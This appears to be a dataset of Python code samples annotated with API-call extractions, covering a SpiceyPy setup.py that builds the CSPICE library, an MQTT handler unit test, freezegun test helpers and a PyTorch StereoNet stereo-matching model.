InstallCSpice.unpack_cspice()
# Build the shared Library
InstallCSpice.build_library()
# Move to correct location (root of the distribution)
InstallCSpice.move_to_root_directory()
@staticmethod
def windows_method():
if os.path.exists(os.path.join(cspice_dir, "lib", "cspice.dll")):
print("Found pre-made cspice.dll, not building")
elif os.path.exists(os.path.join(root_dir, 'spiceypy', 'utils', 'cspice.dll')):
print("Found pre-made cspice.dll in spiceypy, not building")
else:
# Build the DLL
InstallCSpice.build_library()
# Move to correct location (root of the distribution)
InstallCSpice.move_to_root_directory()
class SpiceyPyBinaryDistribution(Distribution):
def is_pure(self):
return False
def root_is_pure(self):
return False
class PyTest(TestCommand):
# py.test integration from pytest.org
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errcode = pytest.main(self.test_args)
sys.exit(errcode)
class InstallSpiceyPy(install):
"""Class that extends the install command and encapsulates the
process for installing the required CSPICE distribution at the
right place.
"""
def finalize_options(self):
install.finalize_options(self)
self.install_lib = self.install_platlib
def run(self):
InstallCSpice.get_cspice()
install.run(self)
class GetCSPICECommand(Command):
""" Custom command to get the correct cspice and build the shared library for spiceypy """
description = 'downloads cspice and builds the shared library'
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
InstallCSpice.get_cspice()
class BuildPyCommand(build_py):
""" Custom build command to ensure cspice is built and packaged """
def run(self):
InstallCSpice.get_cspice()
build_py.run(self)
cmdclass = { 'install': InstallSpiceyPy,
'test': PyTest,
'build_py': BuildPyCommand,
'get_cspice': GetCSPICECommand }
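# Illustrative invocations of the commands wired up above (assuming a source
# checkout of the project):
#   python setup.py get_cspice   # download CSPICE and build the shared library
#   python setup.py test         # run the test suite through the PyTest command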
# https://stackoverflow.com/questions/45150304/how-to-force-a-python-wheel-to-be-platform-specific-when-building-it
# http://lepture.com/en/2014/python-on-a-hard-wheel
try:
from wheel.bdist_wheel import bdist_wheel
print("Wheel is Present")
class _bdist_wheel(bdist_wheel):
def finalize_options(self):
bdist_wheel.finalize_options(self)
self.root_is_pure = False
def get_tag(self):
# TODO: since I use six, in future consider replacing first two tags with py2.py3 and none
tag = bdist_wheel.get_tag(self)
repl = 'macosx_10_6_intel.macosx_10_9_intel.macosx_10_9_x86_64.macosx_10_10_intel.macosx_10_10_x86_64'
if 'macosx_10' in tag[2]:
tag = (tag[0], tag[1], repl)
return tag
# add our override to the cmdclass dict so we can inject this behavior
cmdclass['bdist_wheel'] = _bdist_wheel
except ImportError:
# we don't have wheel installed so there is nothing to change
print("Wheel is not installed...")
pass
readme = open('README.rst', 'r')
readmetext = readme.read()
readme.close()
setup(
name='spiceypy',
version='2.2.1',
license='MIT',
author='<NAME>',
author_email='<EMAIL>',
description='A Python Wrapper for the NAIF CSPICE Toolkit',
long_description=readmetext,
python_requires='>=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, <4',
keywords=['spiceypy', 'spice', 'naif', 'jpl', 'space', 'geometry'],
url='https://github.com/AndrewAnnex/SpiceyPy',
classifiers=[
"Development Status :: 5 - Production/Stable",
"Natural Language :: English",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Astronomy",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Operating System :: MacOS :: MacOS X",
"Operating System :: POSIX :: Linux",
"Operating System :: POSIX :: BSD :: FreeBSD",
"Operating System :: Microsoft :: Windows"
],
packages=['spiceypy', 'spiceypy.utils'],
include_package_data=True,
zip_safe=False,
distclass=SpiceyPyBinaryDistribution,
package_data={'spiceypy': ['utils/*.so', "utils/*.dll"]},
setup_requires=DEPENDENCIES,
install_requires=DEPENDENCIES,
requires=REQUIRES,
tests_require=TEST_DEPENDENCIES,
cmdclass=cmdclass,
test_suite='spiceypy.tests.test_wrapper.py',
extras_require={'testing': ['pytest']}
)
|
[
"getspice.GetCSPICE",
"setuptools.command.install.install.finalize_options",
"wheel.bdist_wheel.bdist_wheel.get_tag",
"pytest.main",
"os.path.isfile",
"setuptools.command.install.install.run",
"os.path.join",
"os.chdir",
"shutil.copy",
"os.waitpid",
"os.path.exists",
"subprocess.Popen",
"os.path.realpath",
"os.rename",
"platform.system",
"sys.exit",
"setuptools.setup",
"wheel.bdist_wheel.bdist_wheel.finalize_options",
"os.getcwd",
"setuptools.command.test.test.finalize_options",
"setuptools.command.build_py.build_py.run"
] |
[((1458, 1475), 'platform.system', 'platform.system', ([], {}), '()\n', (1473, 1475), False, 'import platform\n'), ((1703, 1735), 'os.path.join', 'os.path.join', (['root_dir', '"""cspice"""'], {}), "(root_dir, 'cspice')\n", (1715, 1735), False, 'import os\n'), ((1787, 1818), 'os.path.join', 'os.path.join', (['cspice_dir', '"""lib"""'], {}), "(cspice_dir, 'lib')\n", (1799, 1818), False, 'import os\n'), ((11268, 12691), 'setuptools.setup', 'setup', ([], {'name': '"""spiceypy"""', 'version': '"""2.2.1"""', 'license': '"""MIT"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'description': '"""A Python Wrapper for the NAIF CSPICE Toolkit"""', 'long_description': 'readmetext', 'python_requires': '""">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, <4"""', 'keywords': "['spiceypy', 'spice', 'naif', 'jpl', 'space', 'geometry']", 'url': '"""https://github.com/AndrewAnnex/SpiceyPy"""', 'classifiers': "['Development Status :: 5 - Production/Stable',\n 'Natural Language :: English', 'Topic :: Scientific/Engineering',\n 'Topic :: Scientific/Engineering :: Astronomy',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Operating System :: MacOS :: MacOS X',\n 'Operating System :: POSIX :: Linux',\n 'Operating System :: POSIX :: BSD :: FreeBSD',\n 'Operating System :: Microsoft :: Windows']", 'packages': "['spiceypy', 'spiceypy.utils']", 'include_package_data': '(True)', 'zip_safe': '(False)', 'distclass': 'SpiceyPyBinaryDistribution', 'package_data': "{'spiceypy': ['utils/*.so', 'utils/*.dll']}", 'setup_requires': 'DEPENDENCIES', 'install_requires': 'DEPENDENCIES', 'requires': 'REQUIRES', 'tests_require': 'TEST_DEPENDENCIES', 'cmdclass': 'cmdclass', 'test_suite': '"""spiceypy.tests.test_wrapper.py"""', 'extras_require': "{'testing': ['pytest']}"}), "(name='spiceypy', version='2.2.1', license='MIT', author='<NAME>',\n author_email='<EMAIL>', description=\n 'A Python Wrapper for the NAIF CSPICE Toolkit', long_description=\n readmetext, python_requires=\n '>=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, <4', keywords=[\n 'spiceypy', 'spice', 'naif', 'jpl', 'space', 'geometry'], url=\n 'https://github.com/AndrewAnnex/SpiceyPy', classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Natural Language :: English', 'Topic :: Scientific/Engineering',\n 'Topic :: Scientific/Engineering :: Astronomy',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Operating System :: MacOS :: MacOS X',\n 'Operating System :: POSIX :: Linux',\n 'Operating System :: POSIX :: BSD :: FreeBSD',\n 'Operating System :: Microsoft :: Windows'], packages=['spiceypy',\n 'spiceypy.utils'], include_package_data=True, zip_safe=False, distclass\n =SpiceyPyBinaryDistribution, package_data={'spiceypy': ['utils/*.so',\n 'utils/*.dll']}, setup_requires=DEPENDENCIES, install_requires=\n DEPENDENCIES, requires=REQUIRES, tests_require=TEST_DEPENDENCIES,\n cmdclass=cmdclass, test_suite='spiceypy.tests.test_wrapper.py',\n extras_require={'testing': ['pytest']})\n", (11273, 12691), False, 'from setuptools import setup, Command\n'), ((1625, 1651), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (1641, 1651), False, 'import os\n'), ((5073, 5084), 'os.getcwd', 
'os.getcwd', ([], {}), '()\n', (5082, 5084), False, 'import os\n'), ((6752, 6765), 'os.chdir', 'os.chdir', (['cwd'], {}), '(cwd)\n', (6760, 6765), False, 'import os\n'), ((6901, 6955), 'os.path.join', 'os.path.join', (['root_dir', '"""spiceypy"""', '"""utils"""', 'sharedlib'], {}), "(root_dir, 'spiceypy', 'utils', sharedlib)\n", (6913, 6955), False, 'import os\n'), ((8808, 8842), 'setuptools.command.test.test.finalize_options', 'TestCommand.finalize_options', (['self'], {}), '(self)\n', (8836, 8842), True, 'from setuptools.command.test import test as TestCommand\n'), ((8968, 8995), 'pytest.main', 'pytest.main', (['self.test_args'], {}), '(self.test_args)\n', (8979, 8995), False, 'import pytest\n'), ((9004, 9021), 'sys.exit', 'sys.exit', (['errcode'], {}), '(errcode)\n', (9012, 9021), False, 'import sys\n'), ((9256, 9286), 'setuptools.command.install.install.finalize_options', 'install.finalize_options', (['self'], {}), '(self)\n', (9280, 9286), False, 'from setuptools.command.install import install\n'), ((9398, 9415), 'setuptools.command.install.install.run', 'install.run', (['self'], {}), '(self)\n', (9409, 9415), False, 'from setuptools.command.install import install\n'), ((9951, 9969), 'setuptools.command.build_py.build_py.run', 'build_py.run', (['self'], {}), '(self)\n', (9963, 9969), False, 'from setuptools.command.build_py import build_py\n'), ((2910, 2936), 'os.path.exists', 'os.path.exists', (['cspice_dir'], {}), '(cspice_dir)\n', (2924, 2936), False, 'import os\n'), ((3165, 3200), 'getspice.GetCSPICE', 'getspice.GetCSPICE', ([], {'version': '"""N0066"""'}), "(version='N0066')\n", (3183, 3200), False, 'import getspice\n'), ((3501, 3576), 'os.path.join', 'os.path.join', (['lib_dir', "('cspice.lib' if host_OS is 'Windows' else 'cspice.a')"], {}), "(lib_dir, 'cspice.lib' if host_OS is 'Windows' else 'cspice.a')\n", (3513, 3576), False, 'import os\n'), ((3606, 3685), 'os.path.join', 'os.path.join', (['lib_dir', "('csupport.lib' if host_OS is 'Windows' else 'csupport.a')"], {}), "(lib_dir, 'csupport.lib' if host_OS is 'Windows' else 'csupport.a')\n", (3618, 3685), False, 'import os\n'), ((6971, 6998), 'os.path.isfile', 'os.path.isfile', (['destination'], {}), '(destination)\n', (6985, 6998), False, 'import os\n'), ((8083, 8128), 'os.path.join', 'os.path.join', (['cspice_dir', '"""lib"""', '"""cspice.dll"""'], {}), "(cspice_dir, 'lib', 'cspice.dll')\n", (8095, 8128), False, 'import os\n'), ((10466, 10500), 'wheel.bdist_wheel.bdist_wheel.finalize_options', 'bdist_wheel.finalize_options', (['self'], {}), '(self)\n', (10494, 10500), False, 'from wheel.bdist_wheel import bdist_wheel\n'), ((10688, 10713), 'wheel.bdist_wheel.bdist_wheel.get_tag', 'bdist_wheel.get_tag', (['self'], {}), '(self)\n', (10707, 10713), False, 'from wheel.bdist_wheel import bdist_wheel\n'), ((3220, 3246), 'os.path.exists', 'os.path.exists', (['cspice_dir'], {}), '(cspice_dir)\n', (3234, 3246), False, 'import os\n'), ((3349, 3366), 'sys.exit', 'sys.exit', (['message'], {}), '(message)\n', (3357, 3366), False, 'import sys\n'), ((3704, 3730), 'os.path.exists', 'os.path.exists', (['cspice_lib'], {}), '(cspice_lib)\n', (3718, 3730), False, 'import os\n'), ((3735, 3763), 'os.path.exists', 'os.path.exists', (['csupport_lib'], {}), '(csupport_lib)\n', (3749, 3763), False, 'import os\n'), ((3787, 3798), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (3796, 3798), False, 'import os\n'), ((4947, 4970), 'sys.exit', 'sys.exit', (['error_Message'], {}), '(error_Message)\n', (4955, 4970), False, 'import sys\n'), ((5139, 5156), 
'os.chdir', 'os.chdir', (['lib_dir'], {}), '(lib_dir)\n', (5147, 5156), False, 'import os\n'), ((5279, 5348), 'subprocess.Popen', 'subprocess.Popen', (['"""gcc -shared -fPIC -lm *.o -o spice.so"""'], {'shell': '(True)'}), "('gcc -shared -fPIC -lm *.o -o spice.so', shell=True)\n", (5295, 5348), False, 'import subprocess\n'), ((7049, 7091), 'os.path.join', 'os.path.join', (['cspice_dir', '"""lib"""', 'sharedlib'], {}), "(cspice_dir, 'lib', sharedlib)\n", (7061, 7091), False, 'import os\n'), ((7135, 7187), 'os.path.join', 'os.path.join', (['cspice_dir', '"""src"""', '"""cspice"""', 'sharedlib'], {}), "(cspice_dir, 'src', 'cspice', sharedlib)\n", (7147, 7187), False, 'import os\n'), ((7304, 7334), 'os.rename', 'os.rename', (['target', 'destination'], {}), '(target, destination)\n', (7313, 7334), False, 'import os\n'), ((8220, 8277), 'os.path.join', 'os.path.join', (['root_dir', '"""spiceypy"""', '"""utils"""', '"""cspice.dll"""'], {}), "(root_dir, 'spiceypy', 'utils', 'cspice.dll')\n", (8232, 8277), False, 'import os\n'), ((3840, 3857), 'os.chdir', 'os.chdir', (['lib_dir'], {}), '(lib_dir)\n', (3848, 3857), False, 'import os\n'), ((4762, 4775), 'os.chdir', 'os.chdir', (['cwd'], {}), '(cwd)\n', (4770, 4775), False, 'import os\n'), ((5374, 5402), 'os.waitpid', 'os.waitpid', (['build_lib.pid', '(0)'], {}), '(build_lib.pid, 0)\n', (5384, 5402), False, 'import os\n'), ((5970, 6011), 'os.path.join', 'os.path.join', (['cspice_dir', '"""src"""', '"""cspice"""'], {}), "(cspice_dir, 'src', 'cspice')\n", (5982, 6011), False, 'import os\n'), ((6038, 6086), 'os.path.join', 'os.path.join', (['root_dir', '"""appveyor"""', '"""cspice.def"""'], {}), "(root_dir, 'appveyor', 'cspice.def')\n", (6050, 6086), False, 'import os\n'), ((6113, 6171), 'os.path.join', 'os.path.join', (['root_dir', '"""appveyor"""', '"""makeDynamicSpice.bat"""'], {}), "(root_dir, 'appveyor', 'makeDynamicSpice.bat')\n", (6125, 6171), False, 'import os\n'), ((6188, 6221), 'shutil.copy', 'shutil.copy', (['defFile', 'destination'], {}), '(defFile, destination)\n', (6199, 6221), False, 'import shutil\n'), ((6238, 6271), 'shutil.copy', 'shutil.copy', (['makeBat', 'destination'], {}), '(makeBat, destination)\n', (6249, 6271), False, 'import shutil\n'), ((6321, 6342), 'os.chdir', 'os.chdir', (['destination'], {}), '(destination)\n', (6329, 6342), False, 'import os\n'), ((6375, 6427), 'subprocess.Popen', 'subprocess.Popen', (['"""makeDynamicSpice.bat"""'], {'shell': '(True)'}), "('makeDynamicSpice.bat', shell=True)\n", (6391, 6427), False, 'import subprocess\n'), ((7583, 7594), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (7592, 7594), False, 'import os\n'), ((5554, 5565), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (5563, 5565), False, 'import os\n'), ((4154, 4187), 'subprocess.Popen', 'subprocess.Popen', (['lib'], {'shell': '(True)'}), '(lib, shell=True)\n', (4170, 4187), False, 'import subprocess\n'), ((4233, 4270), 'os.waitpid', 'os.waitpid', (['unpack_lib_process.pid', '(0)'], {}), '(unpack_lib_process.pid, 0)\n', (4243, 4270), False, 'import os\n')]
|
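A minimal, self-contained sketch of the custom-command pattern used above (command name and message are hypothetical, not part of the package):

from setuptools import Command

class HelloCommand(Command):
    """Minimal custom command, mirroring the GetCSPICECommand pattern."""
    description = 'prints a greeting'
    user_options = []  # no command-line flags

    def initialize_options(self):
        pass

    def finalize_options(self):
        pass

    def run(self):
        print('hello from a custom setuptools command')

# wired in via setup(..., cmdclass={'hello': HelloCommand})
# and invoked as: python setup.py hello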
'''
Tests MQTT functionality.
'''
import unittest
from unittest.mock import patch
from modules import rec_mqtt
class DummyMessage: # pylint: disable=R0903
'''Creating a mock response'''
def __init__(self, command):
        self.payload = command
    topic = 'test_hub'
class TestOnMessage(unittest.TestCase):
'''unit tests for the MQTT module'''
def test_function_calls(self):
'''
Checks that the function calls are correct.
'''
with patch('modules.rec_mqtt.rec_api.link_hub') as mock_link:
self.assertTrue(
rec_mqtt.on_message('test_client', None, DummyMessage('170'))
)
mock_link.assert_called()
with patch('modules.rec_mqtt.rec_api.pull_data_dump') as mock_pull:
rec_mqtt.on_message('test_client', None, DummyMessage('186'))
mock_pull.assert_called()
with patch('modules.rec_mqtt.mqtt_start_update') as mock_update:
rec_mqtt.on_message('test_client', None, DummyMessage('202'))
mock_update.assert_called()
with patch('modules.rec_mqtt.rec_api.update_time_zone') as mock_timezone:
rec_mqtt.on_message('test_client', None, DummyMessage('218'))
mock_timezone.assert_called()
with patch('modules.rec_mqtt.mqtt_restart_system') as mock_restart:
rec_mqtt.on_message('test_client', None, DummyMessage('234'))
mock_restart.assert_called()
with patch('modules.rec_mqtt.zip_send') as mock_zip:
rec_mqtt.on_message('test_client', None, DummyMessage('250'))
mock_zip.assert_called()
|
[
"unittest.mock.patch"
] |
[((517, 559), 'unittest.mock.patch', 'patch', (['"""modules.rec_mqtt.rec_api.link_hub"""'], {}), "('modules.rec_mqtt.rec_api.link_hub')\n", (522, 559), False, 'from unittest.mock import patch\n'), ((747, 795), 'unittest.mock.patch', 'patch', (['"""modules.rec_mqtt.rec_api.pull_data_dump"""'], {}), "('modules.rec_mqtt.rec_api.pull_data_dump')\n", (752, 795), False, 'from unittest.mock import patch\n'), ((936, 979), 'unittest.mock.patch', 'patch', (['"""modules.rec_mqtt.mqtt_start_update"""'], {}), "('modules.rec_mqtt.mqtt_start_update')\n", (941, 979), False, 'from unittest.mock import patch\n'), ((1124, 1174), 'unittest.mock.patch', 'patch', (['"""modules.rec_mqtt.rec_api.update_time_zone"""'], {}), "('modules.rec_mqtt.rec_api.update_time_zone')\n", (1129, 1174), False, 'from unittest.mock import patch\n'), ((1323, 1368), 'unittest.mock.patch', 'patch', (['"""modules.rec_mqtt.mqtt_restart_system"""'], {}), "('modules.rec_mqtt.mqtt_restart_system')\n", (1328, 1368), False, 'from unittest.mock import patch\n'), ((1515, 1549), 'unittest.mock.patch', 'patch', (['"""modules.rec_mqtt.zip_send"""'], {}), "('modules.rec_mqtt.zip_send')\n", (1520, 1549), False, 'from unittest.mock import patch\n')]
|
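The tests above repeat one pattern: patch the collaborator, fire the handler, assert the call. The same pattern in isolation, with all names hypothetical:

from unittest.mock import patch

class Handler:
    def on_message(self, payload):
        if payload == '170':
            self.link_hub()

    def link_hub(self):
        raise RuntimeError('should be patched out in tests')

with patch.object(Handler, 'link_hub') as mock_link:
    Handler().on_message('170')
    mock_link.assert_called()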
from functools import wraps
from nose.plugins import skip
from freezegun.api import FakeDate, FakeDatetime, _is_cpython
def is_fake_date(obj):
return obj.__class__ is FakeDate
def is_fake_datetime(obj):
return obj.__class__ is FakeDatetime
def cpython_only(func):
@wraps(func)
def wrapper(*args):
if not _is_cpython:
raise skip.SkipTest("Requires CPython")
return func(*args)
return wrapper
|
[
"nose.plugins.skip.SkipTest",
"functools.wraps"
] |
[((285, 296), 'functools.wraps', 'wraps', (['func'], {}), '(func)\n', (290, 296), False, 'from functools import wraps\n'), ((367, 400), 'nose.plugins.skip.SkipTest', 'skip.SkipTest', (['"""Requires CPython"""'], {}), "('Requires CPython')\n", (380, 400), False, 'from nose.plugins import skip\n')]
|
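The same conditional-skip decorator can be written without the unmaintained nose dependency; a sketch using only the standard library in place of nose.plugins.skip:

import sys
import unittest
from functools import wraps

def cpython_only(func):
    @wraps(func)
    def wrapper(*args, **kwargs):
        if sys.implementation.name != 'cpython':
            raise unittest.SkipTest('Requires CPython')
        return func(*args, **kwargs)
    return wrapper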
# ------------------------------------------------------------------------------
# Copyright (c) NKU
# Licensed under the MIT License.
# Written by <NAME> (<EMAIL>)
# ------------------------------------------------------------------------------
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import torch.backends.cudnn as cudnn
def convbn(in_channel, out_channel, kernel_size, stride, pad, dilation):
return nn.Sequential(
nn.Conv2d(
in_channel,
out_channel,
kernel_size=kernel_size,
stride=stride,
            padding=dilation if dilation > 1 else pad,
dilation=dilation),
nn.BatchNorm2d(out_channel))
def convbn_3d(in_channel, out_channel, kernel_size, stride, pad):
return nn.Sequential(
nn.Conv3d(
in_channel,
out_channel,
kernel_size=kernel_size,
padding=pad,
stride=stride),
nn.BatchNorm3d(out_channel))
class BasicBlock(nn.Module):
def __init__(self, in_channel, out_channel, stride, downsample, pad, dilation):
super().__init__()
self.conv1 = nn.Sequential(
convbn(in_channel, out_channel, 3, stride, pad, dilation),
nn.LeakyReLU(negative_slope=0.2, inplace=True))
self.conv2 = convbn(out_channel, out_channel, 3, 1, pad, dilation)
self.downsample = downsample
self.stride = stride
def forward(self, x):
out = self.conv1(x)
        # NOTE: self.conv2 is defined but never applied here, which looks like a
        # bug in the original; uncomment the next line to use the full residual block.
        # out = self.conv2(out)
        if self.downsample is not None:
            x = self.downsample(x)
        out = x + out  # residual connection
return out
class FeatureExtraction(nn.Module):
def __init__(self, k):
super().__init__()
self.k = k
self.downsample = nn.ModuleList()
in_channel = 3
out_channel = 32
for _ in range(k):
self.downsample.append(
nn.Conv2d(
in_channel,
out_channel,
kernel_size=5,
stride=2,
padding=2))
in_channel = out_channel
out_channel = 32
self.residual_blocks = nn.ModuleList()
for _ in range(6):
self.residual_blocks.append(
BasicBlock(
32, 32, stride=1, downsample=None, pad=1, dilation=1))
self.conv_alone = nn.Conv2d(32, 32, kernel_size=3, stride=1, padding=1)
def forward(self, rgb_img):
output = rgb_img
for i in range(self.k):
output = self.downsample[i](output)
for block in self.residual_blocks:
output = block(output)
return self.conv_alone(output)
class EdgeAwareRefinement(nn.Module):
def __init__(self, in_channel):
super().__init__()
self.conv2d_feature = nn.Sequential(
convbn(in_channel, 32, kernel_size=3, stride=1, pad=1, dilation=1),
nn.LeakyReLU(negative_slope=0.2, inplace=True))
self.residual_astrous_blocks = nn.ModuleList()
        astrous_list = [1, 2, 4, 8, 1, 1]
for di in astrous_list:
self.residual_astrous_blocks.append(
BasicBlock(
32, 32, stride=1, downsample=None, pad=1, dilation=di))
self.conv2d_out = nn.Conv2d(32, 1, kernel_size=3, stride=1, padding=1)
def forward(self, low_disparity, corresponding_rgb):
output = torch.unsqueeze(low_disparity, dim=1)
        twice_disparity = F.interpolate(
            output,
            size=corresponding_rgb.size()[-2:],
            mode='bilinear',
            align_corners=False)
        if corresponding_rgb.size()[-1] / low_disparity.size()[-1] >= 1.5:
            # disparity values scale with image width, so double them when upsampling by ~2x
            twice_disparity *= 2
output = self.conv2d_feature(
torch.cat([twice_disparity, corresponding_rgb], dim=1))
for astrous_block in self.residual_astrous_blocks:
output = astrous_block(output)
return nn.ReLU(inplace=True)(torch.squeeze(
twice_disparity + self.conv2d_out(output), dim=1))
class disparityregression(nn.Module):
def __init__(self, maxdisp):
super().__init__()
self.disp = torch.FloatTensor(
np.reshape(np.array(range(maxdisp)), [1, maxdisp, 1, 1])).cuda()
def forward(self, x):
disp = self.disp.repeat(x.size()[0], 1, x.size()[2], x.size()[3])
out = torch.sum(x * disp, 1)
return out
class StereoNet(nn.Module):
def __init__(self, k, r, maxdisp=192):
super().__init__()
self.maxdisp = maxdisp
self.k = k
self.r = r
self.feature_extraction = FeatureExtraction(k)
self.filter = nn.ModuleList()
for _ in range(4):
self.filter.append(
nn.Sequential(
convbn_3d(32, 32, kernel_size=3, stride=1, pad=1),
nn.LeakyReLU(negative_slope=0.2, inplace=True)))
self.conv3d_alone = nn.Conv3d(
32, 1, kernel_size=3, stride=1, padding=1)
self.edge_aware_refinements = nn.ModuleList()
for _ in range(r):
self.edge_aware_refinements.append(EdgeAwareRefinement(4))
def forward(self, left, right):
disp = (self.maxdisp + 1) // pow(2, self.k)
refimg_feature = self.feature_extraction(left)
targetimg_feature = self.feature_extraction(right)
# matching
cost = torch.FloatTensor(refimg_feature.size()[0],
refimg_feature.size()[1],
disp,
refimg_feature.size()[2],
refimg_feature.size()[3]).zero_().cuda()
for i in range(disp):
if i > 0:
cost[:, :, i, :, i:] = refimg_feature[ :, :, :, i:] - targetimg_feature[:, :, :, :-i]
else:
cost[:, :, i, :, :] = refimg_feature - targetimg_feature
cost = cost.contiguous()
for f in self.filter:
cost = f(cost)
cost = self.conv3d_alone(cost)
cost = torch.squeeze(cost, 1)
pred = F.softmax(cost, dim=1)
pred = disparityregression(disp)(pred)
img_pyramid_list = []
for i in range(self.r):
img_pyramid_list.append(F.interpolate(
left,
scale_factor=1 / pow(2, i),
mode='bilinear',
align_corners=False))
img_pyramid_list.reverse()
        pred_pyramid_list = [pred]
        for i in range(self.r):
pred_pyramid_list.append(self.edge_aware_refinements[i](
pred_pyramid_list[i], img_pyramid_list[i]))
length_all = len(pred_pyramid_list)
for i in range(length_all):
            pred_pyramid_list[i] = pred_pyramid_list[i] * (
                left.size()[-1] / pred_pyramid_list[i].size()[-1])
pred_pyramid_list[i] = torch.squeeze(
F.interpolate(
torch.unsqueeze(pred_pyramid_list[i], dim=1),
size=left.size()[-2:],
mode='bilinear',
align_corners=False),
dim=1)
return pred_pyramid_list
if __name__ == '__main__':
model = StereoNet(k=3, r=3).cuda()
    # model.eval()
    import datetime
    input = torch.FloatTensor(1, 3, 540, 960).zero_().cuda()
    # warm-up iterations before timing
    for i in range(100):
        out = model(input, input)
start = datetime.datetime.now()
    for i in range(100):
        out = model(input, input)
end = datetime.datetime.now()
print((end-start).total_seconds())
|
[
"torch.nn.BatchNorm3d",
"torch.nn.ReLU",
"torch.nn.ModuleList",
"torch.nn.Conv3d",
"torch.sum",
"torch.nn.Conv2d",
"torch.FloatTensor",
"torch.cat",
"torch.nn.functional.softmax",
"torch.squeeze",
"torch.nn.BatchNorm2d",
"torch.unsqueeze",
"torch.nn.LeakyReLU",
"datetime.datetime.now"
] |
[((7858, 7881), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (7879, 7881), False, 'import datetime\n'), ((7967, 7990), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (7988, 7990), False, 'import datetime\n'), ((482, 622), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channel', 'out_channel'], {'kernel_size': 'kernel_size', 'stride': 'stride', 'padding': '(dilation if dilation > 1 else pad)', 'dilation': 'dilation'}), '(in_channel, out_channel, kernel_size=kernel_size, stride=stride,\n padding=dilation if dilation > 1 else pad, dilation=dilation)\n', (491, 622), True, 'import torch.nn as nn\n'), ((698, 725), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['out_channel'], {}), '(out_channel)\n', (712, 725), True, 'import torch.nn as nn\n'), ((829, 920), 'torch.nn.Conv3d', 'nn.Conv3d', (['in_channel', 'out_channel'], {'kernel_size': 'kernel_size', 'padding': 'pad', 'stride': 'stride'}), '(in_channel, out_channel, kernel_size=kernel_size, padding=pad,\n stride=stride)\n', (838, 920), True, 'import torch.nn as nn\n'), ((986, 1013), 'torch.nn.BatchNorm3d', 'nn.BatchNorm3d', (['out_channel'], {}), '(out_channel)\n', (1000, 1013), True, 'import torch.nn as nn\n'), ((1822, 1837), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (1835, 1837), True, 'import torch.nn as nn\n'), ((2235, 2250), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (2248, 2250), True, 'import torch.nn as nn\n'), ((2448, 2501), 'torch.nn.Conv2d', 'nn.Conv2d', (['(32)', '(32)'], {'kernel_size': '(3)', 'stride': '(1)', 'padding': '(1)'}), '(32, 32, kernel_size=3, stride=1, padding=1)\n', (2457, 2501), True, 'import torch.nn as nn\n'), ((3082, 3097), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (3095, 3097), True, 'import torch.nn as nn\n'), ((3370, 3422), 'torch.nn.Conv2d', 'nn.Conv2d', (['(32)', '(1)'], {'kernel_size': '(3)', 'stride': '(1)', 'padding': '(1)'}), '(32, 1, kernel_size=3, stride=1, padding=1)\n', (3379, 3422), True, 'import torch.nn as nn\n'), ((3498, 3535), 'torch.unsqueeze', 'torch.unsqueeze', (['low_disparity'], {'dim': '(1)'}), '(low_disparity, dim=1)\n', (3513, 3535), False, 'import torch\n'), ((4566, 4588), 'torch.sum', 'torch.sum', (['(x * disp)', '(1)'], {}), '(x * disp, 1)\n', (4575, 4588), False, 'import torch\n'), ((4854, 4869), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (4867, 4869), True, 'import torch.nn as nn\n'), ((5128, 5180), 'torch.nn.Conv3d', 'nn.Conv3d', (['(32)', '(1)'], {'kernel_size': '(3)', 'stride': '(1)', 'padding': '(1)'}), '(32, 1, kernel_size=3, stride=1, padding=1)\n', (5137, 5180), True, 'import torch.nn as nn\n'), ((5241, 5256), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (5254, 5256), True, 'import torch.nn as nn\n'), ((6262, 6284), 'torch.squeeze', 'torch.squeeze', (['cost', '(1)'], {}), '(cost, 1)\n', (6275, 6284), False, 'import torch\n'), ((6300, 6322), 'torch.nn.functional.softmax', 'F.softmax', (['cost'], {'dim': '(1)'}), '(cost, dim=1)\n', (6309, 6322), True, 'import torch.nn.functional as F\n'), ((1275, 1321), 'torch.nn.LeakyReLU', 'nn.LeakyReLU', ([], {'negative_slope': '(0.2)', 'inplace': '(True)'}), '(negative_slope=0.2, inplace=True)\n', (1287, 1321), True, 'import torch.nn as nn\n'), ((2995, 3041), 'torch.nn.LeakyReLU', 'nn.LeakyReLU', ([], {'negative_slope': '(0.2)', 'inplace': '(True)'}), '(negative_slope=0.2, inplace=True)\n', (3007, 3041), True, 'import torch.nn as nn\n'), ((3954, 4008), 'torch.cat', 'torch.cat', (['[twice_disparity, corresponding_rgb]'], {'dim': '(1)'}), 
